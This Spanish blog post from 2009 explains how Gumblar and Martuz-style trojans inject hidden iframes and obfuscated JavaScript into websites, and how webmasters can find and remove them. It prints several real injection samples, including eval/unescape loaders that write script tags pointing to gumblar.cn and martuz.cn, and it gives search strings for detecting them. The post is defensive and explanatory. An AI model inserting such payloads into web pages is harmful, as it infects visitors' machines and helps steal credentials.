Septiembre del 2009

Estás viendo los artículos de Dominios y hosting - noticias de guiawebmaster.com correspondientes al mes Septiembre del 2009.

Inyección de código y ataques al sitio web

En la actualidad se dan muchos casos de sitios webs que aparecen como infectados a causa de la aparición de un código javascript o iframe que el webmaster no ha añadió en su sitio web y provoca que su sitio sea considerado como infectado con la consecuencia de ser potencialmente peligroso para los visitantes y ser considerado como tal por buscadores como Google que puede llevar a bloquear nuestro sitio en sus listados de búsqueda indicando que la web  se encuentra infectada por un troyano o malware.

Este tipo de inyecciones de código normalmente se producen en:

- Sitios web basados en aplicaciones open source (wordpress, joomla, foros …) que contienen bugs o fallos de seguridad y que el webmaster no ha actualizado a su última versión (recordemos que la mayoría de actualizaciones menores están destinadas a corregir fallos de seguridad en estas aplicaciones).

- Directamente a través de FTP, cuando el atacante consigue los datos ftp del alojamiento web, entonces el atacante accede directamente con los datos correctos vía FTP y descarga todos los ficheros html, php, htm… y los vuelve a cargar de forma automática con el código javascript o iframe a cada fichero.

 Los datos FTP los puede conseguir a través de virus o troyanos que infectan el PC del usuario a través vulnerabilidades en software instalado en el ordenador que no está actualizado (player de flash, adobre reader, navegador de internet …), de manera que cuando el ordenador está infectado el troyano busca códigos ftp en el ordenador y los utiliza para inyectar el iframe en los documentos del sitio web.

Las páginas web que se ven afectados con más frecuencia son las del tipo index.php, index.htm, index.html, pero en ocasiones, en el caso de que el sitio web sea dinámico y  esté basado en plantillas, tpls etc (foros, blogs, wikis, cms) pueden verse afectados todos los archivos del sitio.

La forma más habitual de infección es la inyección de un iframe en el/los documentos html que componen el sitio.

Ejemplos de códigos maliciosos inyectados son:

<iframe src=”http://webmaliciosa:8080/index.php” mce_src=”http:// webmaliciosa:8080/index.php” width=107 height=152 style=”visibility: hidden”></ifram e>

O códigos más complejos como:

(function(jil){var xR5p=’%’;eval(unes..cape((’var”20a”3d”22Sc”72iptEngin”65″22″2c….”62″3d”22″56ers”69on()+”22″2c”6a”3d”22″22″2cu”61t”6 …………… “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(docdumen″2ecookie”2e”6ddfa9ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2fdd”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).rep lace(jifdsfel,xR5p)))})(/”/g)

En la mayoría de los casos la función no tiene nombre, es anónima y de autollamada. Estas acciones son provocadas por troyanos del tipo Gumblar, Martuz o variantes de los mismos.

¿Como debo proceder para prevenir y/o eliminar la infección?

- Vacíe la caché de su navegador.

- Desactive la caché de su navegador.

- Actualice los programas Adobe Acrobat Reader y Adobe Flash Player –

- Actualice su antivirus y haga un análisis completo de su ordenador

- Limpie el código malicioso, buscándolo en todas las páginas que conforman su sitio web y eliminando las líneas de código con aspecto similar a:

(function(){var G33z1=’%’;var KlKj=’va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-adfaads69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-2626(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d’;var m8nw=KlKj.rep lace(/-/g,G33z1);e val(unescape(m8nw))})();

_________________________________________________________________________________________

<iframe src=”http://webmaliciosa:8080/index.php” mce_src=”http:// webmaliciosa:8080/index.php” width=107 height=152 style=”visibility: hidden”></i frame> __________________________________________________________________________________________var a=”ScriptEngine”,b=”Version()+”,j=””,u=navigator.userAgent;
if((u.indexOf(”Chrome”)<0)&&(u.indexOf(”Win”)>0)&&(u.indexOf(”NT 6″)<0)&&(document.cookie.indexOf(”miek=1″)<0)&&(typeof(zrvzssfs)!=typeof(”A”))){
zrvzts=”A”;eval(”if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);
document.w rite(”<script src=//martu”+”z.cn/vid/?id=”+j+”><\/scrip t>”);}

La búsqueda del código malicioso, si el sitio web está compuesto por una gran cantidad de documentos puede ser una labor muy tediosa, para hacerlo algo más cómodo puede buscar en todo el sitio web automáticamente con su editor web por cadenas de palabras, por ejemplo:

Buscar en todo el sitio las palabras

Iframe

script src =” Martuz for-like

visibility: hidden

Cuando encuentre estas líneas de código, fíjese en ellas y si no han sido introducidas por usted, elimínelas de su código fuente en todos aquellos documentos de su web en los que estén presentes.

Una vez limpiado el código de su sitio web, recuerde CAMBIAR LA CONTRASEÑA FTP y solicitar a cualquier otra persona que haya tenido acceso a su hosting mediante ftp (diseñador web, programador …) que realice las mismas acciones.

Guarda tus contraseñas en un gestor de contraseñas como Any Password (gratuito) y no las almacenes en tu correo o en archivos de texto, word o excel en tu ordenador.

Escrito por admin el 21 de Septiembre de 2009 con 0 comentarios
Lee más artículos sobre Alojamiento web.